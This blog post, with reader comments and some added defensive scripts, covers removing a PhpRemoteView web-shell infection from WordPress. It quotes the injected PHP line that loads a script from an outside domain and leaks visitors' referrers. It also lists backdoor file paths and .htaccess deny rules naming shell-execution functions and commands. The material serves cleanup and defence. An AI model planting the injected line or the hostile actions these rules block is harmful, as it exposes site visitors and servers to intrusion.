PHP, Ubuntu, Ubuntu Server Tricks, Web Programming|August 6, 2011 8:21 pm


Removing PHPRemoteView hack attack from your WordPress

Hello guys.

An annoying morning I had today :( Checking my blog I saw a very unpleasant popup coming from my blog:

Yes, I'm another victim of some hacker, but there are things we can do to counter this problem. PhpRemoteView is a PHP web shell: a browser-based file manager and command runner that an attacker drops onto the server as a .php file and then uses through ordinary HTTP requests. It is well known to many people who own WordPress blogs and a complete headache for tech-support people. Even the WordPress people do not give a clear answer about the problem.

But no worries, I found out what we need to do to rescue your blog (and mine included). The first thing to do is to check the source code of the page your blog serves, looking for something unusual. I found this unusual code at the bottom of my HTML:

<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref=http%3A%2F%2Fwww.tbogard.com%2Fwp-admin%2Findex.php"></script>

Then open the index.php in the root of your blog. A clean WordPress index.php ends with the require of wp-blog-header.php; the attacker appended one more line after it, which injects the script above into every page (the ref= parameter leaks the referring URL of each visitor to the attacker's host). Remove that last line:

echo'<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

So one piece of code down; nevertheless I still had that annoying PhpRemoteView coming from my blog. I checked my network traffic and it seemed everything was working fine (sorry, no screenshot of that moment). As far as my research went, thanks to Jason Cosper I figured out that one of the plugins was causing the trouble. So I renamed my plugins directory to plugins.bak, and voila! The site was back and I was able to access the WP backend: no PhpRemoteView login, and full access to my WordPress administration backend :D .

Nevertheless I had a couple of bad feelings. My first concern was security, so we need to fix the permissions of the whole directory: if you are one of those who use 0777 on every file, you are asking for an easy death, because every local user and every script on the server can then overwrite your code. The first thing is to secure your directory. If you are root on Ubuntu, do your WordPress blog this favor and run a chmod on all the files of your blog installation:

chmod -R 0755 /www/wordpress/www.tbogard.com

(0755 means the owner may read, write and execute, and everyone else may only read and execute. Applied recursively it also marks every .php, .jpg and .css file executable, which nothing needs; the stricter choice is 0755 on directories and 0644 on files, see the security measures at the end of this post.)

My second concern was to find where and when PhpRemoteView is being loaded. The text "PhpRemoteView" is displayed somewhere by the blog, so it must be in some file; let's look for it:

grep -r "PhpRemoteView" /www/wordpress/www.tbogard.com

(Note: a trailing slash on the directory is harmless with GNU grep. What does matter is that grep -r does not follow symbolic links it meets inside the tree, only the ones given on the command line; if wp-content or uploads is a symlink, use grep -R instead. Also consider adding -i, since a renamed or re-cased copy of the shell would otherwise be missed.)

Aha! There are two files containing this string:

  • /wp-admin/js/config.php
  • /wp-admin/common.php

Update, thanks to Techspheria: there are additional files to look for (note that the last two live under wp-content/uploads, where WordPress never stores PHP, so any .php file there is suspect by itself):

  • /wp-admin/udp.php
  • /wp-content/udp.php
  • /wp-content/uploads/feed-file.php
  • /wp-content/uploads/feed-files.php

So let's search which files in my plugins.bak directory are loading these files:

grep -r "common.php" /www/wordpress/www.tbogard.com/wp-content/plugins.bak
grep -r "config.php" /www/wordpress/www.tbogard.com/wp-content/plugins.bak

The grep for "common.php" gives me this result:

common.php: a medium-sized chunk of code

The grep for "config.php" gives me this result:

config.php: a huge chunk of code

Update: several users of premium WordPress templates have told me that timthumb.php was the entry point for this attack. Old versions of the TimThumb image-resizing script (before 2.0) would fetch a file from a URL an attacker could choose and write it into TimThumb's web-accessible cache directory on your server; a file containing PHP stored that way can then be requested and executed, which is how the dropped files above get onto a blog whose WordPress itself is up to date. If you use WP-Zoom templates, update the timthumb.php file to the current version. In my case, I use Cadabrapress, and timthumb.php is found in /wp-content/themes/cadabrapress/scripts. If you use WP-Zoom templates, check the scripts folder of your template. Thanks to Benoist Rousseau for his comments.

Analyzing the results and the behavior of the plugins, I decided to delete wp-minify from my plugins directory. I think wp-minify is creating the problem, since it is the only file that loads a "common.php" but also loads information in compressed JS related to config.php, the other PhpRemoteView attack file. If you really need it, I suggest you find another alternative for JS compression, but better avoid it for now.

Since the site is back to normal, we can remove these files. The bad news is that you may need to reactivate your plugins.

Activate only the plugins you consider essential to your site, and for your security avoid plugins that execute PHP placed inside posts.

Note: also, if you use WP-Cache, CLEAR IT COMPLETELY!!! It may preserve cached pages that still contain the injected script, which is why the popup or redirect can persist after the files are gone. If you couldn't get rid of the problem, delete the plugin PHYSICALLY and install a fresh copy.
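The search steps above (the line appended to index.php, the dropped files listed by Techspheria and the commenters, PHP files under uploads where WordPress never puts any, and the TimThumb copies from the update) combined into one read-only triage script. This is an added example, not code from the original post. It assumes GNU grep, find and sed as shipped with Ubuntu. The shell signature, the injected domain and the file paths are the ones named in the post; the function names, the way the TimThumb version line is parsed, and the sample tree built by make_sample_tree are assumptions constructed for the demonstration (the sample is not a real site):

```shell
#!/bin/sh
# Added example (not from the original post): read-only triage for the
# indicators described above. Nothing is deleted by the scan; findings are
# printed so each one can be inspected and backed up before removal.
# Assumes GNU grep/find/sed (Ubuntu).

tab=$(printf '\t')

# Indicators taken from the post: how the shell names itself, the injected
# counter domain, and the dropped-file paths reported by the author and the
# commenters. Everything else below is an assumption for the demonstration.
SHELL_SIG='PhpRemoteView|remview'
INJECT_SIG='superpuperdomain\.com/count\.php'
KNOWN_BACKDOORS='wp-admin/js/config.php
wp-admin/common.php
wp-admin/udp.php
wp-content/udp.php
wp-content/uploads/feed-file.php
wp-content/uploads/feed-files.php'

# scan_wp_root ROOT: prints one "TAG<tab>path" line per finding.
scan_wp_root() {
    root=$1
    # Files mentioning the shell by name. -i also catches a re-cased copy
    # that the post's exact-match grep would miss.
    grep -rliE "$SHELL_SIG" "$root" 2>/dev/null | sed "s/^/SHELL_SIG$tab/"
    # Files carrying the appended count.php script line.
    grep -rlE "$INJECT_SIG" "$root" 2>/dev/null | sed "s/^/INJECTED_JS$tab/"
    # Dropped files at the paths listed in the post and its comments.
    printf '%s\n' "$KNOWN_BACKDOORS" | while IFS= read -r rel; do
        if [ -f "$root/$rel" ]; then printf '%s\n' "KNOWN_BACKDOOR$tab$root/$rel"; fi
    done
    # WordPress itself never stores PHP under wp-content/uploads, so any
    # .php file there was put there by something else.
    find "$root/wp-content/uploads" -type f -name '*.php' 2>/dev/null \
        | sed "s/^/PHP_IN_UPLOADS$tab/"
}

# list_timthumb ROOT: every timthumb.php copy with the version it declares.
# Assumption: the script declares it as  define ('VERSION', '1.33');
# "unknown" means no such line was found.
list_timthumb() {
    find "$1" -type f -name 'timthumb.php' | while IFS= read -r f; do
        v=$(sed -n "s/.*define *( *'VERSION', *'\([0-9.]*\)'.*/\1/p" "$f" | head -n 1)
        printf '%s\n' "TIMTHUMB$tab$f$tab${v:-unknown}"
    done
}

# recent_php_files ROOT DAYS: PHP files changed in the last DAYS days, for
# dropped files whose names are not on the list above.
recent_php_files() {
    find "$1" -type f -name '*.php' -mtime -"${2:-7}"
}

# remove_injected_line FILE BACKUPDIR: keeps an evidence copy outside the web
# root, then deletes the appended script line (the manual index.php step).
remove_injected_line() {
    cp -p "$1" "$2/"
    sed -i "\#$INJECT_SIG#d" "$1"
}

# make_sample_tree: constructed WordPress tree reproducing the symptoms from
# the post (not a real site). Prints its path; remove it when done.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-admin/js" "$d/wp-content/uploads/2011/08" \
             "$d/wp-content/themes/cadabrapress/scripts" "$d/wp-includes"
    printf '%s\n' '<?php' "require('./wp-blog-header.php');" \
        "echo'<script type=\"text/javascript\" src=\"http://superpuperdomain.com/count.php?ref='.urlencode(\$_SERVER['HTTP_REFERER']).'\"></script>';" \
        > "$d/index.php"
    printf '%s\n' '<?php /* PhpRemoteView */' > "$d/wp-admin/js/config.php"
    printf '%s\n' '<?php /* dropped file */' > "$d/wp-content/uploads/feed-file.php"
    printf 'JFIF' > "$d/wp-content/uploads/2011/08/photo.jpg"
    printf '%s\n' "<?php define ('VERSION', '1.33');" \
        > "$d/wp-content/themes/cadabrapress/scripts/timthumb.php"
    printf '%s\n' '<?php $wp_version = "3.2.1";' > "$d/wp-includes/version.php"
    printf '%s\n' "$d"
}

# Usage on a real install:  scan_wp_root /www/wordpress/www.tbogard.com
# Demonstration on the constructed tree:
demo=$(make_sample_tree)
backup=$(mktemp -d)
scan_wp_root "$demo"
list_timthumb "$demo"
remove_injected_line "$demo/index.php" "$backup"
scan_wp_root "$demo"   # the INJECTED_JS line is gone, the rest remains
rm -rf "$demo" "$backup"
```

Run the scan before touching anything and keep the listed files (copied outside the web root, as remove_injected_line does) for the log review later: the dropped files' timestamps are what you will match against the access log.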

With this your blog is back to life.

Security measures.

If you host many sites on your server, do not let any PHP script run under 0777 permissions; it is very harmful to your security, because any user or script on the machine can then modify it. Instead, do this as root:

  1. Once the problem is gone, do your WordPress a favor and keep it updated; also update your plugins to their latest working and stable versions.
  2. Make sure the content of the web directory has one consistent owner. The simplest choice is www-data; if you are not sure, execute:
    chown -R www-data:www-data /your/wordpress/directory
    Keep the trade-off in mind: PHP runs as www-data, so a compromised plugin or a dropped file can then rewrite every file of the site. The stricter layout is to keep the code owned by your own user and give www-data write access only to wp-content/uploads (and any cache directory a plugin needs).
  3. Make sure all the permissions are set to 0755. This does not change the owner; it means the owner can read, write and execute (enter, for a directory), and everybody else can only read and execute. Applied recursively it also marks every file executable, which no file needs; if you can, give directories 0755 and files 0644 instead:
    chmod -R 0755 /your/wordpress/directory
  4. Check the web server logs under /var/log (on Ubuntu, /var/log/apache2/access.log and its rotated copies). Requests to the dropped files listed above, POST requests to .php files under wp-content/uploads, and requests to timthumb.php with an external URL in the src= parameter tell you from which address, and when, the attack was carried out.
  5. Update your Ubuntu installation to the latest patches. apt-get update only refreshes the package index; the upgrade is what installs them:
    apt-get update && apt-get upgrade
  6. Change the passwords of root and of the other users, and also the WordPress admin password and the database password stored in wp-config.php (a shell like this one can read that file). We do not know how deep the attack went, so it is very advisable to change them all.
  7. Bots are your most probable source of problems, since they can submit very complex input through your forms to exploit your blog. Protect against them using WP-reCaptcha or spam-stopper.
  8. Also a very important piece of code: update your .htaccess! (Again, thanks to Benoist Rousseau.) If you want to shield your WordPress installation against PhpRemoteView, do this:
    1. Make a copy of your .htaccess in case the rules do not work well.
    2. Add this code to your .htaccess, above the "# BEGIN WordPress" block. Two things differ from the rules as first posted in the comments. Apache does not accept a comment at the end of a directive line: the "## ATTENTION ..." remark after the cmd= condition makes Apache reject the .htaccess with "RewriteCond: bad flag delimiters" and answer 500 Internal Server Error to every request (the most likely cause of the "blog not accessible" reported in the comments), so the warning now sits on its own line. And consecutive [OR] conditions form one group that is ANDed with the next group, so the file-name condition was ORed only with the request-method check and could never block a request by itself; it is now a separate rule.
    RewriteEngine On
    # Requests for files named like known web shells, whatever the query string
    RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC]
    RewriteRule .* - [F]
    # Query strings that look like web-shell commands
    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
    RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
    # WARNING: THE NEXT CONDITION BLOCKS ANY QUERY STRING CONTAINING "cmd=" AND CAN BREAK YOUR SITE
    RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
    RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
    RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
    RewriteRule .* - [F]
    3. Test the site afterwards, including a search and the admin area: the cmd= condition and the last two conditions match ordinary words (any parameter set to ls, cd, clear, more or head, or any query string containing exec or system), so legitimate requests can be blocked. If something breaks, remove the offending condition rather than the whole block.
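Steps 2 to 4 of the list as a script: the permission fix with the execute bit only on directories and wp-config.php hidden from other users, an optional stricter ownership layout, a check for the 0777 files the post warns about, and a first pass over the Apache access log for the requests that created and used the dropped files. This is an added example, not the post's own commands. It assumes the Ubuntu layout (GNU find and grep, the www-data user, /var/log/apache2/access.log in the combined format); the function names are mine, and the log lines in SAMPLE_LOG are constructed for the demonstration with documentation address ranges (the request paths in them are the ones named in the post):

```shell
#!/bin/sh
# Added example (not from the original post): steps 2-4 of the list done the
# way a practitioner would. Assumes Ubuntu: GNU find/grep, the www-data user
# and an Apache combined-format access log.

tab=$(printf '\t')

# find_world_writable ROOT: the 0777 files and directories the post warns
# about (anything writable by "other").
find_world_writable() {
    find "$1" -perm -002
}

# harden_wp_perms ROOT [OWNER [WEBGROUP]]: directories 0755, files 0644, the
# upload directory group-writable, wp-config.php unreadable to "other".
# Ownership is only changed when OWNER is given (needs root). OWNER=www-data
# reproduces step 2 of the post; the stricter layout is OWNER=your deploy user
# and WEBGROUP=www-data, so a compromised PHP process can write only to uploads.
harden_wp_perms() {
    root=$1; owner=$2; webgroup=${3:-$2}
    if [ -n "$owner" ]; then
        chown -R "$owner:$webgroup" "$root"
    fi
    # chmod -R 0755 would also set x on every file; x belongs on directories only.
    find "$root" -type d -exec chmod 0755 {} +
    find "$root" -type f -exec chmod 0644 {} +
    if [ -d "$root/wp-content/uploads" ]; then
        find "$root/wp-content/uploads" -type d -exec chmod 0775 {} +
        find "$root/wp-content/uploads" -type f -exec chmod 0664 {} +
    fi
    # Holds the database password; owner and group (the web server) can still read it.
    if [ -f "$root/wp-config.php" ]; then chmod 0640 "$root/wp-config.php"; fi
}

# grep_access_log LOGFILE: the requests worth reading first, tagged by what they hit.
grep_access_log() {
    log=$1
    # Hits on the dropped files named in the post and its comments.
    grep -E '(wp-admin/(js/config|common|udp)|wp-content/(udp|uploads/feed-files?))\.php' "$log" \
        | sed "s/^/KNOWN_BACKDOOR$tab/"
    # POST to a PHP file under uploads: a dropped file being used.
    grep -E 'POST [^ ]*wp-content/uploads/[^ ]*\.php' "$log" \
        | sed "s/^/POST_TO_UPLOADS$tab/"
    # timthumb.php asked to fetch an absolute URL, the way old TimThumb
    # versions were abused; check whether the host in src= is one of yours.
    grep -E 'timthumb\.php\?[^ ]*src=https?(%3A|:)' "$log" \
        | sed "s/^/TIMTHUMB_REMOTE_SRC$tab/"
}

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG='203.0.113.7 - - [06/Aug/2011:03:12:41 +0000] "GET /wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://203.0.113.7/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Aug/2011:03:12:45 +0000] "POST /wp-content/uploads/feed-file.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Aug/2011:03:13:02 +0000] "GET /wp-admin/js/config.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.4 - - [06/Aug/2011:08:21:10 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 9030 "-" "Mozilla/5.0"
198.51.100.4 - - [06/Aug/2011:08:21:12 +0000] "GET /wp-content/uploads/2011/08/photo.jpg HTTP/1.1" 200 21000 "-" "Mozilla/5.0"'

# Usage on a real server (as root):
#   find_world_writable /www/wordpress/www.tbogard.com
#   harden_wp_perms /www/wordpress/www.tbogard.com www-data
#   grep_access_log /var/log/apache2/access.log
# Demonstration on the constructed log:
logf=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$logf"
grep_access_log "$logf"
rm -f "$logf"
```

The three tagged lines in the sample show the usual sequence: the TimThumb fetch that plants the file, the POST that uses it, and the visit to the dropped admin file. Once you have the attacker's address from those, a plain grep for that address over the whole log (and the rotated copies) gives the complete timeline.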
    

If you find this article useful, leave a comment and share your experience. Only shared knowledge can help others overcome problems. Thank you! Also, if you think my work on finding a solution for this hack attack was worth it, give a small donation… a programmer has to live on something ^_^

28 Comments

  • Thank you so much for this post… I had the same problem this morning and I followed your advice, but as I'm not good enough at programming editing I couldn't do anything else but delete the code line and rename the plugins directory to plugin.bak… Now of course I am blogging without my plugins; I do not dare to go back to the old plugins directory… I will ask friends to check further and keep you posted… Thanks

    • Hi Julien. If I were you, I would try to find out whether my template uses timthumb and update it to the latest version. Also, avoid wp-minify. Thank you for sharing your experience.

      • Hi again… I deleted wp-minify but didn't find timthumb… how can I know whether it's there or not? My blog template is WP-zoom.
        Nobody could help me so far, so my blog is still blocked on some levels: people cannot comment anymore… Very annoying… Any tip?

        • Checking your blog, I saw your timthumb.php here:

          /wp-content/themes/videozoom/scripts/timthumb.php

          so update this file and half of your problems will be solved.

          Also, if you use WP-Cache (I guess you do), clear it once you delete the common.php and config.php explained above.

          • Oh my god. I had no ht.access so I created one at the root adding your piece of code… It made the blog not accessible so I deleted the ht.access… Now the articles are not accessible. I cannot do what you recommend… So I am stuck… Any help… It does feel like a catastrophe… Can you help?

          • do not worry, use mine :D

            Remember: it's .htaccess, not ht.access

            #start shield
            <IfModule mod_rewrite.c>
            RewriteEngine On
            # Requests for files named like known web shells, whatever the query string
            RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC]
            RewriteRule .* - [F]
            # Query strings that look like web-shell commands
            RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
            RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
            RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
            RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
            RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
            # WARNING: THE NEXT CONDITION BLOCKS ANY QUERY STRING CONTAINING "cmd=" AND CAN BREAK YOUR SITE
            # (Apache does not allow a comment at the end of a directive line, so it has to be here)
            RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR]
            RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
            RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
            RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
            RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
            RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
            RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
            RewriteRule .* - [F]
            </IfModule>
            #end shield
            
            # BEGIN WordPress
            <IfModule mod_rewrite.c>
            RewriteEngine On
            RewriteBase /
            RewriteRule ^index\.php$ - [L]
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteCond %{REQUEST_FILENAME} !-d
            RewriteRule . /index.php [L]
            </IfModule>
            
            # END WordPress
            
          • Also write me to tb.erick.rodriguez[at]gmail.com, so i can provide a better help.

  • Hi,
    you are great!!
    My site was hacked exactly like you described above.

    Now I have deleted all the malicious files.
    Let us watch closely for this again.

    A few days ago almost all WP premium theme members were notified to update the timthumb script to its latest version.
    So I think that this hack might have come via the timthumb.php script.
    Now I did the update too, after this attack.

    Anyway, thanks for pointing out this hack.

    • yes, it also comes from old versions of timthumb. I wonder why the WordPress people do not release an advisory to everyone (WP Premium or not, we are all WP users). Thanks for sharing your experience.

  • You can use this in your .htaccess to block PhpRemoteView commands and others.

    RewriteEngine On
    RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)=/home/loginftp/(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
    RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
    # WARNING: THE NEXT CONDITION CAN BREAK YOUR SITE
    # (a comment may not follow the flags on the same line: Apache rejects the file with "bad flag delimiters")
    RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
    RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
    RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
    RewriteRule .* - [F]

    Save a copy of your .htaccess first!

  • In the fifth line, change "/home/loginftp/" to your absolute file path up to the folder "www" or "public_html". This rule is very effective but can break your blog, forum, CMS, gallery or wiki. Use it as a last resort and test intensively, and delete the rule if it is problematic.

  • It's a hack via TimThumb. Update to version 2 and that will prevent this. ;)

    • Thanks Benoist, your post was fundamentally helpful to shield WP installations against PhpRemoteView. I added your htaccess code to my installation and it works OK. If I were you I would change the fifth line:

      RewriteCond %{QUERY_STRING} ^(.*)=/home/loginftp/(.*)$ [OR]

      to

      RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]

      it will secure the whole of /home, without the risk that someone takes the rights of other users or escalates the rights of the www-data user and hijacks the whole server at once.

  • thanks, it helped me

  • I just noticed the date of this post. Yeah, I just received an attack as well on the 6th with the same domain Superduper.
    Files edited were my index and an e5e580bb7e6f5e01ecf1be2c21a834e7.html type file in my wp-content. There was the following code echo”; ?> in my index. Everything was 705.
    Files added:
    Common.php + udp.php in wp-admin
    config.php in wp-admin/js
    udp in wp-content

    Once all that’s removed, site works like a charm!

  • I too was hacked on the 6th; I can access the site but I couldn't access wp-admin/. After looking at this article I just deleted the minify plugin using FTP.

    This worked perfectly.
    My hosting company is GoDaddy.

    Mart

  • I was running almost 17 blogs on my server and because of one loophole all of my blogs were hacked. I applied your method and survived in time. One thing I did extra is that I reverted my blogs to an older WordPress version, as this problem seems to hit the recent 3.2.1 version of WordPress. Can you please explain whether that is the right step?

    • First, keep this in mind:

      a. Do not revert to older versions of WordPress; it will make the problem worse. Locate the files I mention above: /wp-admin/js/config.php and /wp-admin/common.php

      b. Delete the wp-minify and wp-cache plugins from your blogs (wp-cache preserves bad scripts) and update timthumb.php.

      c. Once you have done a and b, rename plugins.bak back to plugins, which will revive the good plugins. Make sure to UPDATE ALL OF THEM!!!! It is very important to have updated versions to avoid exploits.

  • Thank you. It works

  • I had the same problem with my blog. I deleted these files on Saturday, but now I have a message from NoScript, which blocks the address 192.168.246.205. I see the same message on this page – maybe something else is left in our blog?

    • You know, it would be useful to have a snapshot of your network traffic using Firebug, so you can detect the name of the script and where it is being loaded from. Check your source code and determine where it is being loaded. If there is funny code messing around, check your plugins and see where the problem is.

  • Now the site works correctly, hmm… I don't know why the message was there before. Sorry for the false post.

  • Heeey, I just got this. I deleted the strange php files but I could not find the code in the index.

    Can anyone help me out :(

    My site can be found on my name if you want to look

  • Thanks a million John! I've bookmarked your blog, and have cleaned and updated all my clients' blogs accordingly (mine included)

    I feel much safer now with this fix and your suggestions.

    Regards,
    Serge

  • Thanks for this, my site was hacked this way too. I took the necessary precautions as you said. You're a lifesaver!

  • I had fixed everything but was still getting the redirect until I found your site with the tip to clear the cache – great!

    But what was really great was that orochinagi.com was saved by Terry Bogard? Coincidence or fate? BUSTER WOLF OK!
